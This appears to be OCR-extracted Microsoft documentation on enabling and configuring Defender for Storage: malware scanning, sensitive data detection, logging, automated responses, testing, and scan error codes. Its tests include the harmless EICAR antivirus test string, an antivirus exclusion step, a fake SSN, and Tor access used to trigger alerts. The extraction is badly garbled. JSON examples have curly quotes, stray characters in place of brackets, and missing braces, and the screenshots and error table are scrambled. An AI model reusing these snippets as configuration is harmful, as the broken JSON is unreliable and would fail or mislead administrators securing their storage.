using an ARM (Azure Resource Manager) template, add this JSON snippet to the 
resources section of your ARM template: 


"type": "Microsoft.Security/pricings", 
"apiVersion": "2023-01-01", 
"name": "StorageAccounts", 
"properties": { 
"pricingTier": "Standard", 
"subPlan": "“DefenderForStorageV2", 
"extensions": [ 
{ 
"name": "“OnUploadMalwareScanning", 
“isEnabled": "True", 
"additionalExtensionProperties": { 
"CapGBPerMonthPerStorageAccount": "5000" 


J 

{ 
"name": "SensitiveDataDiscovery", 
"isEnabled": "True" 

} 


Modifying the monthly cap for malware scanning 


To modify the monthly threshold for malware scanning in your storage accounts, 
simply adjust the CapGBPerMonthPerStorageAccount parameter to your preferred 


value. This parameter sets a cap on the maximum data that can be scanned for 
malware each month, per storage account. If you want to permit unlimited 
scanning, assign the value -1. The default limit is set at 5,000 GB. 


Disabling features 


If you want to turn off the on-upload malware scanning or sensitive data threat 
detection features, you can change the isEnabled value to False under sensitive 


data discovery. 
Disabling the entire Defender for Storage plan 


To disable the entire Defender plan, set the pricingTier property value to Free and 


remove the subPlan and extension properties. 


Learn more about the ARM template in the Microsoft.Security/Pricings 
documentation. 


Next steps 


Learn more about the Microsoft.Security/DefenderForStorageSettings API 


documentation. 


Enable and configure with REST API 
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We recommend that you enable Defender for Storage on the subscription level. Doing 
so ensures all storage accounts in the subscription will be protected, including future 


ones. 


Tip 
You can always configure specific storage accounts with custom configurations 
that differ from the settings configured at the subscription level (override 


subscription-level settings). 


Enable on a subscription 


To enable and configure Microsoft Defender for Storage at the subscription level 
using REST API, create a PUT request with this endpoint (replace the 
subscriptionId in the endpoint URL with your own Azure subscription ID): 


PUT 
https: //management.azure.com/subscriptions/{subscriptionId}/providers/Mi 


crosoft.Security/pricings/StorageAccounts ?api-version=2023-01-01 


And add the following request body: 


"properties": { 
"extensions": [ 


{ 
"name": "“OnUploadMalwareScanning", 
“isEnabled": "True", 
"additionalExtensionProperties": { 

"CapGBPerMonthPerStorageAccount": "5000" 

} 

Fe 

{ 
"name": “SensitiveDataDiscovery", 
"isEnabled": "True" 


L 
"subPlan": "DefenderForStorageV2", 
"pricingTier": "Standard" 


To modify the monthly threshold for malware scanning in your storage accounts, 
adjust the CapGBPerMonthPerStorageAccount parameter to your preferred value. This 
parameter sets a cap on the maximum data that can be scanned for malware each 
month, per storage account. If you want to permit unlimited scanning, assign the 
value -1. The default limit is set at 5,000 GB. 


If you want to turn off the on-upload malware scanning or Sensitive data threat 
detection features, you can change the isEnabled value to False under Sensitive 
data discovery. 


To disable the entire Defender plan, set the pricingTier property value to Free and 
remove the subPlan and extensions properties. 


Learn more about updating Defender plans with the REST APlin HTTP, Java, Go and 
JavaScript. 


Ọ Tip 


Malware Scanning can be configured to send scanning results to the following: 
Event Grid custom topic - for near-real time automatic response based on every 
scanning result. Learn more how to configure malware scanning to send scanning 
events to an Event Grid custom topic. 

Log Analytics workspace - for storing every scan result in a centralized log 
repository for compliance and audit. Learn more how to configure malware 
scanning to send scanning results to a Log Analytics workspace. 


Learn more on how to set up response for malware scanning results. 


Next steps 


e Learn how to enable and Configure the Defender for Storage plan at scale with an 
Azure built-in policy. 


Enable and configure with the Azure 
portal 
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We recommend that you enable Defender for Storage on the subscription level. Doing 
so ensures all current and future storage accounts in the subscription are protected. 


Q Tip 


You can always configure specific storage accounts with custom configurations 
that differ from the settings configured at the subscription level (override 


subscription-level settings). 


Enable on a subscription (recommended) 


To enable Defender for Storage at the subscription level using the Azure portal: 
1. Sign in to the Azure portal. 
2. Navigate to Microsoft Defender for Cloud > Environment settings. 


3. Select the subscription for which you want to enable Defender for Storage. 


A 6 Total issues 
= 
TGC? Projects2 | AWS Accounts 4 


13/23 plans A 


4. On the Defender plans page, locate Storage in the list and select On and Save. 
If you currently have Defender for Storage enabled with per-transaction 
pricing, select the New pricing plan available link and confirm the pricing 


change. 


Home > Microsoft Defender for Cloud | Environment settings > 


17) Settings | Defender plans 
Devo 


Status 


E Foundational csom d © rul 


g 
> 
E 

g 


Esan dde 


Microsoft Defender for Storage is now enabled for this subscription, and is fully 
protected, including on-upload malware scanning and sensitive data threat 
detection. 


If you want to turn off the on-upload malware scanning or sensitive data threat 
detection, you can select Settings and change the status of the relevant feature to 


Off and save the changes. 


If you want to change the malware scanning size capping per storage account per 
month for malware, change the settings in Edit configuration and save the 


changes. 


If you want to disable the plan, turn status button to Off for the Storage plan on the 
Defender plans page and save the changes. 


Q Tip 


Malware Scanning can be configured to send scanning results to the following: 
Event Grid custom topic - for near-real time automatic response based on every 
scanning result. Learn more how to configure malware scanning to send scanning 
events to an Event Grid custom topic. 

Log Analytics workspace - for storing every scan result in a centralized log 
repository for compliance and audit. Learn more how to configure malware 
scanning to send scanning results to a Log Analytics workspace. 


Next steps 


e Learn how to enable and Configure the Defender for Storage plan at scale with an 
Azure built-in policy. 
e Learn more on how to set up response for malware scanning results. 


Advanced configurations for malware 
scanning 
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Malware Scanning can be configured to send scanning results to the following: 


e Event Grid custom topic - for near-real time automatic response based on every 
scanning result. 

e Log Analytics workspace - for storing every scan result in a centralized log 
repository for compliance and audit. 


Learn more on how to set up response for malware scanning results. 


Q Tip 


We recommend you try the Ninja training instructions “, a hands-on lab, to try out 
malware scanning in Defender for Storage, using detailed step-by-step instructions 
on how to test malware scanning end-to-end with setting up responses to 
scanning results. This is part of the ‘labs’ project that helps customers get ramped 
up with Microsoft Defender for Cloud and provides hands-on practical experience 


with its capabilities. 


Setting up logging for malware scanning 


For each storage account enabled with malware scanning, you can define a Log 
Analytics workspace destination to store every scan result in a centralized log repository 
that is easy to query. 
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Before sending scan results to Log Analytics, create a Log Analytics workspace or use an 


existing one. 


To configure the Log Analytics destination, navigate to the relevant storage account, 
open the Microsoft Defender for Cloud tab, and select the settings to configure. 


This configuration can be performed using REST API as well: 


Request URL: 


HTTP 


PUT 
https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{ 
resourceGroup}/providers/Microsoft.Storage/storageAccounts/{accountName}/pro 
viders/Microsoft.Security/DefenderForStorageSettings/current/providers/Micro 
soft. Insights/diagnosticSettings/service?api-version=2021-05-01-preview 


Request Body: 


HTTP 


"properties": { 

"workspaceld": 
"/subscriptions/{subscriptionId}/resourcegroups/{resourceGroup}/providers/mi 
crosoft.operationalinsights/workspaces/{workspaceName}", 

"logs": [ 

{ 


"category": "ScanResults", 


"enabled": true, 

"retentionPolicy": { 
"enabled": true, 
"days": 180 


Setting up Event Grid for malware scanning 


For each storage account enabled with malware scanning, you can configure to send 


every scan result using an Event Grid event for automation purposes. 


1. To configure Event Grid for sending scan results, you'll first need to create a 
custom topic in advance. Refer to the Event Grid documentation on creating 
custom topics for guidance. Ensure that the destination Event Grid custom topic is 
created in the same region as the storage account from which you want to send 
scan results. 


2. To configure the Event Grid custom topic destination, go to the relevant storage 
account, open the Microsoft Defender for Cloud tab, and select the settings to 
configure. 


© Note 


When you set an Event Grid custom topic, you should set Override Defender for 
Storage subscription-level settings to On to make sure it overrides the 
subscription-level settings. 
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This configuration can be performed using REST API as well: 
Request URL: 


HTTP 


PUT 

https: //management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{ 
resourceGroup}/providers/Microsoft.Storage/storageAccounts/{accountName}/pro 
viders/Microsoft.Security/DefenderForStorageSettings/current?api- 
version=2022-12-01-preview 


Request Body: 


HTTP 


"properties": { 
"isEnabled": true, 
"malwareScanning": { 
"onUpload": { 
"isEnabled": true, 
"capGBPerMonth": 5000 
Jo 
"scanResultsEventGridTopicResourceld": 
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroup}/providers/Mi 
crosoft.EventGrid/topics/{EventGridTopicName}" 
J 
"sensitiveDataDiscovery": { 
"isEnabled": true 


J 


"overrideSubscriptionLevelSettings": true 


Override Defender for Storage subscription- 
level settings 


The subscription-level settings inherit Defender for Storage settings on each storage 
account in the subscription. Use Override Defender for Storage subscription-level 
settings to configure settings for individual storage accounts different from those 
configured on the subscription level. 


Overriding the settings of the subscriptions are usually used for the following scenarios: 


e Enable/disable the Malware Scanning or the Data sensitivity threat detection 
features. 

e Configure custom settings for Malware Scanning. 

e Disable Microsoft Defender for Storage on specific storage accounts. 


O Note 


We recommend that you enable Defender for Storage on the entire subscription to 
protect all existing and future storage accounts in it. However, there are some cases 
where you would want to exclude specific storage accounts from Defender 
protection. If you've decided to exclude, follow the steps below to use the override 
setting and then disable the relevant storage account. If you are using Defender for 
Storage (classic), you can also exclude storage accounts. 


Azure portal 


To configure the settings of individual storage accounts different from those configured 


on the subscription level using the Azure portal: 
1. Sign in to the Azure portal. 
2. Navigate to your storage account that you want to configure custom settings. 


3. In the storage account menu, in the Security + networking section, select 
Microsoft Defender for Cloud. 


4. Select Settings in Microsoft Defender for Storage. 


5. Set the status of Override Defender for Storage subscription-level settings (under 
Advanced settings) to On. This ensures that the settings are saved only for this 
storage account and will not be overrun by the subscription settings. 


6. Configure the settings you want to change: 


a. To enable malware scanning or sensitive data threat detection, set the status to 
On. 


b. To modify the settings of malware scanning: 
i. Switch the On-upload malware scanning to On if it’s not already enabled. 


ii. To adjust the monthly threshold for malware scanning in your storage 
accounts, you can modify the parameter called Set limit of GB scanned per 
month to your desired value. This parameter determines the maximum 
amount of data that can be scanned for malware each month, specifically for 
each storage account. If you wish to allow unlimited scanning, you can 
uncheck this parameter. By default, the limit is set at 5,000 GB. 


7. To disable Defender for Storage on this storage account, set the status of Microsoft 
Defender for Storage to Off. 


Miererat eure © Search resources, services, and docs (G+/) a R Og or 


Home > Storage accounts > contoso-storage-prod Settings a 
e Microsoft Defender for Stora 
© contoso-storage-prod | Microsoft Defender for Cloud x ~ beee 
Storage account 
es Microsoft Defender for Storage €D On 
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Select Save. 


REST API 


To configure the settings of individual storage accounts different from those configured 
on the subscription level using REST API: 


Create a PUT request with this endpoint. Replace the subscriptionld, 
resourceGroupName, and accountName in the endpoint URL with your own Azure 
subscription ID, resource group and storage account names accordingly. 


Request URL: 


HTTP 


PUT 
https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{ 
resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName } 
/providers/Microsoft.Security/DefenderForStorageSettings/current ?api- 
version=2022-12-01-preview 


Request Body: 


HTTP 


"properties": { 
"isEnabled": true, 
"“malwareScanning": { 
"onUpload": { 
"isEnabled": true, 
"capGBPerMonth": 5000 


J 
"sensitiveDataDiscovery": { 
"isEnabled": true 


J 


"overrideSubscriptionLevelSettings": true 


1. To enable malware scanning or sensitive data threat detection, set the value of 
isEnabled to true under the relevant features. 


2. To modify the settings of malware scanning, edit the relevant fields under 
onUpload, make sure the value of isEnabled is true. If you want to permit unlimited 
scanning, assign the value -1 to the capGBPerMonth parameter. 


3. To disable Defender for Storage on this storage accounts, use the following 
request body: 


HTTP 


"properties": { 
"“isEnabled": false, 
“overrideSubscriptionLevelSettings": true 


Make sure you add the parameter overrideSubscriptionLevelSettings and its value is 
set to true. This ensures that the settings are saved only for this storage account and will 
not be overrun by the subscription settings. 


Next steps 


Learn more about malware scanning settings. 


Setting up response to Malware 
Scanning 
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Set up automated responses to move or remove malicious files or to move/ingest clean 
files to another destination. Select the preferred response option that fits your scenario 


architecture. 


With Malware Scanning, you can build your automation response using the following 


scan result options: 


e Defender for Cloud security alerts 
e Event Grid events 
e Blob index tags 


Q Tip 


We invite you to explore the Malware Scanning feature in Defender for Storage 
through our hands-on lab. Follow the Ninja training “ instructions for a detailed, 
step-by-step guide on how to set up and test Malware Scanning end-to-end, 
including configuring responses to scanning results. This is part of the ‘labs’ project 
that helps customers get ramped up with Microsoft Defender for Cloud and 
provide hands-on practical experience with its capabilities. 


Here are some response options that you can use to automate your response: 


Block access to unscanned or malicious files 
using ABAC (attribute-based access control) 


You can block access to malicious and unscanned files with Microsoft Entra Attribute- 
based access control (ABAC) authorization. It allows you to set conditional access to 
blobs based on the scanning results, and allow applications and users to access only 
scanned files that are clean. 


Follow the instructions in the following video Z to set it up. 


Delete or move a malicious blob 


You can use code or workflow automation to delete or move malicious files to 


quarantine. 


Prepare your environment for delete or move 


e Delete the malicious file - Before setting up automated deletion, enabling soft 
delete on the storage account is recommended. It allows to “undelete” files if there 
are false positives or in cases where security professionals want to investigate the 
malicious files. 


e Move the malicious file to quarantine - You can move files to a dedicated storage 
container or storage account that are considered as “quarantine”. You may want 
only certain users, such as a security admin or a SOC analyst, to have permission to 
access this dedicated container or storage account. 

o Using Microsoft Entra ID to control access to blob storage is considered a best 
practice. To control access to the dedicated quarantine storage container, you 
can use container-level role assignments using Microsoft Entra role-based 
access control (RBAC). Users with storage account-level permissions may still be 
able to access the “quarantine” container. You can either edit their permissions 
to be container-level or choose a different approach and move the malicious file 
to a dedicated storage account. 

o If you must use other methods, such as SAS (shared access signatures) tokens 
on the protected storage account, it's best practice to move malicious files to 
another storage account (quarantine). Then, it's best only to grant Microsoft 
Entra permission to access the quarantined storage account. 


Set up automation 


Option 1: Logic App based on Microsoft Defender for Cloud 
security alerts 


Logic App based responses are a simple, no-code approach to setting up response. 
However, the response time is slower than the event-driven code-based approach. 


1. Deploy the DeleteBlobLogicApp £ Azure Resource Manager (ARM) template using 
the Azure portal. 


2. Select the Logic App you deployed. 


3. Add a role assignment to the Logic App to allow it to delete blobs from your 
storage account: 


a. Go to Identity in the side menu and select Azure role assignments. 


x 
E 


contoso-storage-prod > Remove MalwareBlob 


% Remove-MalwareBlob | Identity * 


System assigned User assigned 


ied to the lifecycle of this resource. You can grant permissions to the managed identity by using Azure role-based access control (Azure RBAC). The 


ned managed identity is restricted to one per resour 
i i any credentials in code. Learn more about Managed identities. 


A systom assi 
managed identity is authenti with Azure AD, so you don 


off 
Development Tools TE 
du Logic app designer ‘Object (principal) D 


b. Add a role assignment in the subscription level with the Storage Blob Data 
Contributor role. 


c. Create workflow automation for Microsoft Defender for Cloud alerts: 
i. Go to Microsoft Defender for Cloud in the Azure portal. 
ii. Go to Workflow automation in the side menu. 
iii. Add a new workflow: In the Alert name contains field, fill in Malicious file 


uploaded to storage account and choose your Logic app in the Actions 
section. 


iv. Select Create. 


Ty 


Connie Wilson 


CONTOSO 
Add workflow automation 
General 


Name * 


Delete-maliciuos-blob vV 
Description 


Subscription © 


| ASC DEMO V 


Resource group * © 

LogicApp_demo V 
Trigger conditions © 

Choose the trigger conditions that will automatically trigger the configured action. 


Defender for Cloud data type * 


| Security alert y 


Alert name contains © 


Malicious file uploaded to storage account [v 
Alert severity * 
| All severities selected v | 
Actions 


Configure the Logic App that will be triggered. 
Choose an existing Logic App or visit the Logic Apps page to create a new one 


Show Logic App instances from the following subscriptions * 
| 68 selected v 


Logic App name © 


Remove-MalwareBlob bai 


Refresh View logic app 


cna 


Option 2: Function App based on Event Grid events 
A Function App provides high performance with a low latency response time. 


1. Create a Function App in the same resource group as your protected storage 
account. 


2. Add a role assignment for the Function app identity. 


a. Go to Identity in the side menu, make sure the System assigned identity status 
is On, and select Azure role assignments. 


b. Add a role assignment in the subscription or storage account levels with the 
Storage Blob Data Contributor role. 


3. Consume Event Grid events and connect an Azure Function as the endpoint type. 


4. When writing the Azure Function code, you can use our premade function sample 
- MoveMaliciousBlobEventtTrigger “, or write your own code to copy the blob 
elsewhere, then delete it from the source. 


For each scan result, an event is sent according to the following schema. 


Event message structure 


The event message is a JSON object that contains key-value pairs that provide detailed 
information about a malware scanning result. Here's a breakdown of each key in the 
event message: 


e id: A unique identifier for the event. 


e subject: A string that describes the resource path of the scanned blob (file) in the 
storage account. 


e data: A JSON object that contains additional information about the event: 


o correlationld: A unique identifier that can be used to correlate multiple events 
related to the same scan. 


o blobUri: The URI of the scanned blob (file) in the storage account. 
o eTag: The ETag of the scanned blob (file). 


o scanFinishedTimeUtc: The UTC timestamp when the scan was completed. 


o scanResultType: The result of the scan, for example, "Malicious" or "No 
threats found". 


o scanResultDetails: A JSON object containing details about the scan result: 


1. malwareNamesFound: An array of malware names found in the 
scanned file. 


2. sha256: The SHA-256 hash of the scanned file. 


e eventType: A string that indicates the type of event, in this case, 
"Microsoft.Security.MalwareScanningResult". 


e dataVersion: The version number of the data schema. 

e metadataVersion: The version number of the metadata schema. 

e eventTime: The UTC timestamp when the event was generated. 

e topic: The resource path of the Event Grid topic that the event belongs to. 


Here's an example of an event message: 


JSON 


"id": "52d@@daQ-8f1a-4c3c-aa2c-24831967356b", 
"subject": "storageAccounts/<storage_account_name>/containers/app-logs- 
storage/blobs/EICAR - simulating malware.txt", 
"data": { 
"correlationId": "52d@@da@-8f1a-4c3c-aa2c-24831967356b", 
"pblobUri": "https://<storage_account_name>.blob.core.windows.net/app- 
logs-storage/EICAR - simulating malware.txt", 
"eTag": "@x8DB4C9327B08CBF", 
"scanFinishedTimeUtc": "2023-05-04T11:31:54.0481279Z", 
"scanResultType": "Malicious", 
"scanResultDetails": { 
"malwareNamesFound": [ 
"DOS/EICAR_Test_File” 


E 


"sha256": 
"275A021BBFB6489E54D471899F 7DB9D1663FC695EC2FE2A2C4538AABF651FDOF" 
b 
Fo 
"eventType": "Microsoft.Security.MalwareScanningResult", 
"dataVersion": "1.0", 
"metadataVersion": "1", 
"eventTime": "2023-05-04T11:31:54.048375Z", 
“topic: 


"/subscriptions/<subscription_id>/resourceGroups/<resource_group_name>/provi 


ders/Microsoft.EventGrid/topics/<event_grid_topic_name>" 


} 


By understanding the structure of the event message, you can extract relevant 
information about the Malware Scanning result and process it accordingly. 


Make your applications and data flows aware 
of malware scanning scan results 


Malware scanning is near real-time, and usually, there's a small time window between 
the time of the upload and the time of the scan. Because storage is noncompute, there's 
no risk that malicious files are executed in your storage. The risk is users or applications 
accessing malicious files and spreading them throughout the organization. 


There are a few methods to make your applications and data flows aware of Malware 
Scanning scan results and ensure there's no way to access/process a file before it has 
been scanned and its result has been consumed and acted upon. 


Applications ingest data based on the scan result 


Option 1: Apps checking “Index tag” before processing 


One way to get ingested data is to update all the applications that access the storage 
account. Each application checks the scan result for each file, and if the blob Index tag 
scan result is no threats found, the application reads the blob. 


Option 2: Connect your application to a Webhook in Event Grid 
events 


You can connect your application to a Webhook in Event Grid events and use those 
events to trigger the relevant processes for files that have no threats found scan results. 
Learn more about using Webhook event delivery and validating your endpoint. 


Use an intermediary storage account as a DMZ 


You can set up an intermediary storage account for untrusted content (DMZ) and direct 
uploading traffic to the DMZ. On the untrusted storage account, enable Malware 
Scanning and connect Event Grid and Function App to move only blobs scanned with 
the “no threat found” result to the destination storage account. 


BO 
untrusted destin 
(DMZ) TE 


Next steps 


Learn how to understand results from malware scanning in Microsoft Defender for 


Storage. 


Testing the Defender for Storage data 
security features 
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After you enable Microsoft Defender for Storage, you can test the service and run a 
proof of concept to familiarize yourself with its features and validate the advanced 
security capabilities effectively protect your storage accounts by generating real security 
alerts. This guide will walk you through testing various aspects of the security coverage 
offered by Defender for Storage. 


There are three main components to test: 


e Malware Scanning (if enabled) 
e Sensitive data threat detection (if enabled) 


e Activity monitoring 


@ Tip 
A hands-on lab to try out Malware Scanning in Defender for Storage 


We recommend you try the Ninja training instructions “ for detailed step-by-step 
instructions on how to test Malware Scanning end-to-end with setting up 
responses to scanning results. This is part of the ‘labs’ project that helps customers 
get ramped up with Microsoft Defender for Cloud and provide hands-on practical 


experience with its capabilities. 


Testing Malware Scanning 


Follow these steps to test Malware Scanning after enabling the feature: 


1. To verify that the setup is successful, upload a file to the storage account. You can 


use the Azure portal to upload a file 
2. Inspect new blob index tags: 
a. After uploading the file, view the blob and examine its blob index tags. 


b. You should see two new tags: Malware Scanning scan result and Malware 


Scanning scan time. 


c. The blob index tags serve as a helpful way to view the scan results. 


3. If you don't see the new blob index tags, select the Refresh button. 


Microsoft Azure A Search resources, services, and docs (G+/) Bo Q @ & © S CONTOSO FINANCE (CONTOSOF. d 


Home > samtest9288 | Containers > container 


E container : pass.txt 
Container Blob 
O Search 7 Upload D Change access level d Download Č) Refresh [lil] Delete Æ Changetier s7 Acquire lease Be Give feedback 
— 7 eg CUINTEINT-LAINGUAGE 
E Overview Authentication method: Access key (Switch to 
Azure AD User Account) CONTENT-DISPOSITION 
@ Diagnose and solve problems Location: container 
LEASE STATUS Unlocked 
E 
b Access Control (IAM) Search blobs by prefix (case LEASE STATE Available 
Settings IE Show deleted blobs LEASE DURATION 
COPY STATUS 
@ Shared access tokens te Add filte 
Midi COPY COMPLETION TIME 
® Access policy 
e Name L undelete | 
I Properties 
a DO 
© Metadata pees Metadata 


Key Value 


Blob index tags 


Key Value 
Malware Scanning scan result No threats found E 
Malware Scanning scan time UTC 2023-03-19 21:22:00Z E 


GO Note 


Index tags are not supported for ADLS Gen. To test and validate your protection for 
premium block blobs, look at the generated security alert. 


Upload an EICAR test file to simulate malware upload: 
To simulate a malware upload using an EICAR test file, follow these steps: 
1. Prepare for the EICAR test file: 


a. Use an EICAR test file instead of real malware to avoid causing damage. 
Standardized antimalware software treats EICAR test files as malware. 


b. Exclude an empty folder to prevent your endpoint antivirus protection from 
deleting the file. For Microsoft Defender for Endpoint (MDE) users, refer to add 
an exclusion to Windows Security £. 


2. Create the EICAR test file: 


a. Copy the following string: X50! P%@AP[4\PZX54(P*) 7CC) 7} $EICAR -STANDARD- 


ANTIVIRUS -TEST-FILE! $H+H* 
b. Paste the string into a .TXT file and save it in the excluded folder. 
3. Upload the EICAR test file to your storage account. 


4. Verify the Malware Scanning scan result index tag: 


a. Check for the Malware Scanning scan result index tag with the value Malicious. 
b. If the tags are not visible, select the Refresh button. 
5. Receive a Microsoft Defender for Cloud security alert: 
a. Navigate to Microsoft Defender for Cloud using the search bar in Azure. 
b. Select on Security Alerts. 
6. Review the security alert: 
7. a. Locate the alert titled Malicious file uploaded to storage account. 
8. b. Select on the alert’s View full details button to see all the related details. 


9. Learn more about Defender for Storage security alerts in the reference table for all 
security alerts in Microsoft Defender for Cloud. 


Testing sensitive data threat detection 


To test the sensitive data threat detection feature by uploading test data that represents 


sensitive information to your storage account, follow these steps: 
1. Create a new storage account: 
a. Choose a subscription without Defender for Storage enabled. 


b. Create a new storage account with a random name under the selected 
subscription. 


2. Set up a test container: 
a. Go to the Containers blade in the newly created storage account. 
b. Select the + Container button to create a new blob container. 
c. Name the new container test-container. 

3. Upload test data: 


a. Open a text editing application on your computer, such as Notepad or 
Microsoft Word. 


b. Create a new file and save it in a format like TXT, CSV, or DOCX. 


c. Add the following string to the file: ASD (GGe OO: GOO SSN Text - this is a test US 
(United States) SSN (Social Security Number). 


r > 


E test-sensitive-data.txt x T 


File Edit View £33 


ASD 10@-22-3333 SSN Text 


Ln 1, Col 25 100% Windows (CRLF) UTF-8 


d. Save and upload the file to the test-container in the storage account. 


fy test-container x 
Container 
T Upload a Change access level O Refresh A Give feedback 
Authentication method: Access key (Switch to Azure AD User Account) 
Location: test-container 
Search blobs by prefix (case-sensitive) (e ) Show deleted blobs 
+7 Add filter 
Name Modified Access tier Archive status Blob type Size Lease state 
g © test-sensitive-data.txt 3/27/2023, 10:17:35... Hot (Inferred) Block blob 24B Available 


4. Enable Defender for Storage: 
a. In the Azure portal, go to Microsoft Defender for Cloud. 


b. Enable Defender for Storage on the storage account with the Sensitivity Data 
Discovery feature enabled. 


Sensitive data discovery scans for sensitive information within the first 24 hours 
when enabled at the storage account level or when a new storage account is 
created under a subscription protected by this feature at the subscription level. 
Following this initial scan, the service will scan for sensitive information every 7 
days from the time of enablement. 


O Note 


If you enable the feature and then add sensitive data on the days after 
enablement, the next scan for that newly added data will occur within the next 
7-day scanning cycle, depending on the day of the week the data was added. 


5. Change access level: 


a. Return to the Containers blade. 


b. Right-click on the test-container and select Change the access level. 


25 Container properties 
tainers <æ %* | @ Generate sas x 


P Access policy 


-+ Container â Chan F ee ainers V ©) Refresh DI Delete 


| Search containers by prefi «9 pre a | 


(0 ) Show deleted con: 


Gk Change access level ty 


Name © Edit metadata iblic access level Lease state 
[C] $logs i] Delete ivate Available 
test-container d Open in editor ivate Available aes 


c. Choose the Container (anonymous read access for containers and blobs) 
option and select OK. 


The previous step exposes the blob container's content to the internet, which will 
trigger a security alert within 30-60 minutes. 


6. Review the security alert: 
a. Go to the Security Alerts blade. 


b. Look for the alert titled The access level of a sensitive storage blob container 
was changed to allow unauthenticated public access. 


c. Select on the alert’'s View full details button to see all the related details. 


A Search resources, services and docs (G+/) 


Security alert 2 x 


The access level of a sensitive storage blob 
@ container was changed to allow 
unauthenticated public access General information 


High 314 New (03/27/23 6:14 AM 
Seventy statue arra 


Alert description pen unauthenticated access Mosila/S.0 (Windows NT 10.0; Win6A; x64) 


Sensitivity 
context 


Proguction 


Name AAD Tenant Id Object GUID UPN suffix 


MITRE ATT&CK® tactics 


-Colection 


Learn more about Defender for Storage security alerts in the reference table for all 
security alerts in Microsoft Defender for Cloud. 


Testing activity monitoring 


To test the activity monitoring feature by simulating access from a Tor exit node to a 
storage account, follow these steps: 


1. Create a new storage account with a random name. 
2. Set up a test container: 

a. Go to the Containers blade in the storage account. 

b. Select the + Container button to create a new blob container. 

c. Name the new container test-container-tor. 
3. Upload any file to the test-container-tor. 
4. Generate a SAS (shared access signatures) token: 

a. Right-click on the uploaded file and select Generate SAS. 

b. Select the Generate SAS token and URL button. 

c. Copy the Blob SAS URL. 
5. Download the file using a Tor browser: 

a. Open a Tor browser. 

b. Paste the SAS URL into the address bar and press Enter. 

c. Download the file when prompted. 

The previous step will trigger a Tor anomaly security alert within 1-3 hours. 
6. Review the security alert: 

a. Go to the Security Alerts blade. 


b. Look for the alert titled Access from a Tor exit node to a storage blob 
container. 


c. Select on the alert’'s View full details button to see all the related details. 


Learn more about Defender for Storage security alerts in the reference table for all 
security alerts in Microsoft Defender for Cloud. 


Next steps 


In this article, you learned how to test data protection and threat detection in Defender 
for Storage. 


Learn more about: 
e Threat response 
e Customizing data sensitivity settings 


e Threat detection and alerts 


Understanding malware scanning 
results 
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When a blob is scanned for malware, the scan result can be assessed in several ways: 


e A blob index tag - an index tag with the key “Malware Scanning scan result” (index 
tags aren't supported in storage accounts with hierarchical namespaces enabled). 

e An Event Grid message - allows you to automate responses to scan results. It 
requires more configuration. Learn more about setting up Event Grid for malware 
scanning. 

e A Log Analytics Workspace log entry - by utilizing this method, you can store all 
scan results in a centralized log repository. This repository is designed for easy 
querying, making it a powerful tool for tracking and analyzing scan results. Learn 
more about setting up logging for malware scanning and the Event Grid message 
structure. 

e Asecurity alert in Defender for Cloud (if malware was detected) - you can read 
more about Microsoft Defender for Cloud security alerts. 


Whether you're looking to automate responses to specific scan outcomes or to keep a 
detailed record of all scans, these options can be tailored to meet your needs. 


Scan results fall into two categories: successful states and error states. Understanding 
these states is important for interpreting the results of malware scanning and taking 
appropriate action. 


O Note 


For storage accounts that exceed the throughput capacity and blob size limits for 
Defender for Storage malware scanning, some blobs will not be scanned and will 
not have a scan result. 


Success states 
When a blob is successfully scanned, the scan result indicates either: 
e No threats found - the scan found no malicious content. 


e Malicious - malicious content was found in the uploaded blob. 
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Metadata 


Key Value 


Blob index tags 


Key 


Malware Scanning scan result 


Malware Scanning scan time UTC 


Error states 


æ æ 


& Give feedback 


Malware scanning may fail to scan a blob. When this happens, the scan result indicates 


what the error was. 


Error Message 


SAM259201: "Scan 
failed - internal 
service error." 


SAM259203: "Scan 
failed - couldn't 
access the 
requested blob." 


SAM259204: "Scan 
failed - the 


Cause of Error 


An unexpected internal system error 
occurred during the scan. 


The blob couldn't be accessed due 
to permission restrictions. This can 
happen if someone has accidentally 
removed the malware scanner’s 
permission to read blobs. 
Permissions can also be removed by 
an Azure Policy. 


The blob wasn't found. This may be 
due to deletion, relocation, or 


Guidance 


This is a transient 
error and subsequent 
upload of blobs that 
failed to be scanned 
with this error should 
succeed. 


Look at the storage 
account's Activity 
Log to determine 
who or what 
removed the 
scanner’s 
permissions. Re- 
enable Malware 
scanning. 


N/A 


Does this 
failed 
scanning 
attempt 
incura 
charge? 


No 


No 


No 


Error Message 


requested blob 
wasn't found." 


SAM259205: "Scan 
failed due to ETag 
mismatch - blob 
was possibly 
overwritten." 


SAM259206: "Scan 
aborted - the 
requested blob 
exceeded the 
maximum allowed 
size of 2 GB." 


SAM259207: "Scan 
timed out - the 
requested scan 
exceeded the 
ScanTimeout 
minutes time 
limitation." 


SAM259208: "Scan 
failed - archive 
access tier isn't 
supported.” 


SAM259209: "Scan 
failed - blobs 
encrypted with 
customer provided 
keys aren't 
supported.” 


SAM259210: "Scan 
aborted - the 
requested blob is 


Cause of Error 


renaming after uploading. 


During the process of scanning a 
blob, Malware Scanning ensures 
that the ETag value of the blob 
remains consistent with what it was 
when first uploaded. If the ETag 


doesn't match the expected value, it 


could indicate that the blob has 
been altered by another process or 
user after the upload. 


The blob size exceeded the existing 
size limit, preventing the scan. For 
more information, see the malware 


scanning limitations documentation. 


The scan timed out before 
completion. This error may also 
occur if a preceding step, such as 
downloading the blob for scanning, 
takes too long. 


Blobs in Azure's archive storage tier 
can't be scanned. For more 
information, see the malware 


scanning limitations documentation. 


Client-side encrypted blobs can't be 
decrypted for scanning. For more 
information, see the malware 


scanning limitations documentation. 


The blob is password-protected and 
can't be scanned. For more 
information, see the malware 


scanning limitations documentation. 


Guidance Does this 
failed 
scanning 
attempt 
incur a 
charge? 

N/A No 

N/A No 

This is a transient No 

error and subsequent 

upload of blobs that 

failed to be scanned 

with this error should 

succeed. 

N/A No 

N/A No 

N/A Yes 


PESE RES Ege 


password." 


SAM259211: "Scan 
aborted - 
maximum archive 
nesting depth 
exceeded." 


SAM259212: "Scan 
aborted - the 
requested blob 
data is corrupt." 


Next steps 


Cause of Error 


The maximum archive nesting depth 
was exceeded. 


The blob is corrupted, and Malware 
Scanning was unable to scan it. 


Guidance 


Archive nesting is a 
known method for 
evading malware 
detection. Handle 
this blob with care. 


N/A 


